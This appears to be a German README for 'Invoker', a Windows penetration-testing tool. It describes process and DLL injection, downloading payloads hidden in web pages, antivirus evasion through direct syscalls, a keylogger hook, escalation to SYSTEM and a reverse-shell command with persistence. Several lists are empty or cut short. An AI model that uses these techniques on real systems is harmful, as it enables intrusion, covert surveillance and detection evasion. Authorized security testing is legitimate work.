
Penetrationstest-Dienstprogramm und Antiviren-Bewertungswerkzeug.
Penetrationstest-Dienstprogramm und Antiviren-Bewertungstool.
Erstellt mit Visual Studio Community 2022 v17.5.4 (64-Bit) und getestet unter Windows 10 Enterprise OS (64-Bit).
Für Bildungszwecke erstellt. Ich hoffe, es wird helfen!
Dieses Repository hat bekannte Signaturen und ich habe keine Zeit, jedes Mal neue ausführbare Dateien hochzuladen, daher sollten Sie dieses Projekt selbst kompilieren.
Nützliche Websites:
Zu erledigen:
NtCreateProcessEx bei 32-Bit-Prozessen nicht gut funktioniert.Zukünftige Pläne:
Dinge, die ich beim Programmieren im Hinterkopf behalte:
All dies führt dazu, dass Ihre PE eine kleinere Größe und eine geringere Erkennungsrate hat.
Funktionen:
Überprüfen Sie die Invoker-Bibliothek hier. Sie können sie gerne verwenden!
Einige Funktionen erfordern möglicherweise Administratorrechte.
Einige Funktionen funktionieren möglicherweise nicht unter Windows XP und früher, aufgrund einiger spezifischer Zugriffsrechte und verwendeter Kontrollflags.
Führen Sie Invoker_x86.exe (32-Bit) oder Invoker_x64.exe (64-Bit) aus.
Um die Reverse-Shell-Hintertür zu automatisieren und gleichzeitig Persistenz hinzuzufügen, führen Sie den folgenden Befehl aus:
Invoker_x64.exe 192.168.8.5:9000
32-Bit-Invoker kann:
64-Bit-Invoker kann:
Beachten Sie, dass jede Injektionstechnik sowohl Vor- als auch Nachteile hat; z.B. erfordert eine Technik weniger Zugriffsrechte, verwendet weniger verdächtige Methoden usw., könnte aber z.B. den Prozess zum Absturz bringen, Zeit und andere spezielle Bedingungen benötigen, um die Nutzlast auszuführen, usw.
Beachten Sie, dass einige C2C-Implantate nach dem Freigeben des Speichers möglicherweise nicht funktionieren. Kommentieren Sie in diesem Fall Methoden wie VirtualFreeEx, NtFreeVirtualMemory usw. aus.
Erhöhen Sie Berechtigungen durch Injizieren von Bytecode in einen Prozess mit höheren Berechtigungen.
Dieses Tool kann den Inhalt einer Binärdatei im Speicher herunterladen und in einen laufenden Prozess injizieren. Es kann auch eine HTTP-Antwort parsen und die Nutzlast aus einem benutzerdefinierten Element extrahieren, z.B. aus <invoker>payload</invoker>, wobei payload ein in Base64 codierter Binärcode ist.
Überprüfen Sie das Beispiel unter pastebin.com/raw/xf9Trt0d.
Dies ist nützlich, wenn Ihr Antivirenprogramm ständig Ihre lokalen Nutzlasten löscht.
Überprüfen Sie ein zusätzliches Beispiel unter pastebin.com/raw/iW17rCxH - Nutzlast im Bildelement versteckt.
P.S. Die bereitgestellten Bytecodes werden für Sie höchstwahrscheinlich nicht funktionieren.
Verwenden Sie ngrok, um Ihrem lokalen Webserver eine öffentliche Adresse zu geben.
Um zu sehen, ob ein Prozess 32-Bit oder 64-Bit ist, öffnen Sie den Task-Manager -> klicken Sie auf Weitere Details -> gehen Sie zum Tab Details -> klicken Sie mit der rechten Maustaste auf eine der Spalten -> klicken Sie auf Spalten auswählen -> aktivieren Sie das Kontrollkästchen Plattform.
Um zu sehen, ob ein Prozess mit Administratorrechten ausgeführt wird, aktivieren Sie das Kontrollkästchen Erhöht.
Erfahren Sie, wie Sie eine Reverse-Shell-Nutzlast aus meinem anderen Projekt generieren, sowie wie Sie Ncat und multi/handler-Listener einrichten.
Bytecode-Injektion kann fehlschlagen, da der Bytecode ungültige Zeichen, eine falsche Exit-Funktion oder Kodierung aufweisen kann; DLL-Injektion ist zuverlässiger.
Wenn Sie eine PowerShell-Reverse- oder Bind-Shell vom Invoker aus ausführen möchten, öffnen Sie den Invoker und starten Sie eine PowerShell-Sitzung, führen Sie dann einen der One-Liner (aus meinem anderen Projekt) aus.
Die Bibliothek und Assembly für direkte Systemaufrufe wurden mit SysWhispers2 generiert. Anerkennung an den Autor!
Um dieselbe Bibliothek und Assembly zu generieren, führen Sie den folgenden Befehl in Ihrer bevorzugten Konsole aus:
python3 syswhispers.py -f NtOpenProcess,NtClose,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,NtCreateThreadEx,NtTerminateProcess -a all -o syscalls
Überprüfen Sie meinen Wrapper um die Bibliothek und Assembly hier. Sie können ihn gerne verwenden!
Überprüfen Sie die einfache DLL mit einer Hook-Prozedur hier. Die Hook-Prozedur ruft bei jedem Schließen eines Fensters eine Meldungsbox auf.
Überprüfen Sie die Tastatur-Hook-Prozedur (d.h. Keylogger) hier.
Überprüfen Sie die Maus-Hook-Prozedur, die beim ersten Mausklick einen neuen Prozess startet hier.
Vergessen Sie nicht, nach dem Testen alle erstellten Artefakte zu entfernen, z.B. keylogger.log usw.
Befolgen Sie diese einfachen Schritte:
whoami aus. Sie sollten jetzt nt authority\system sehen.
Abbildung 1 - Invoker

Abbildung 2 - Bytecode-Injektion

Abbildung 3 - Erhöhte Berechtigungen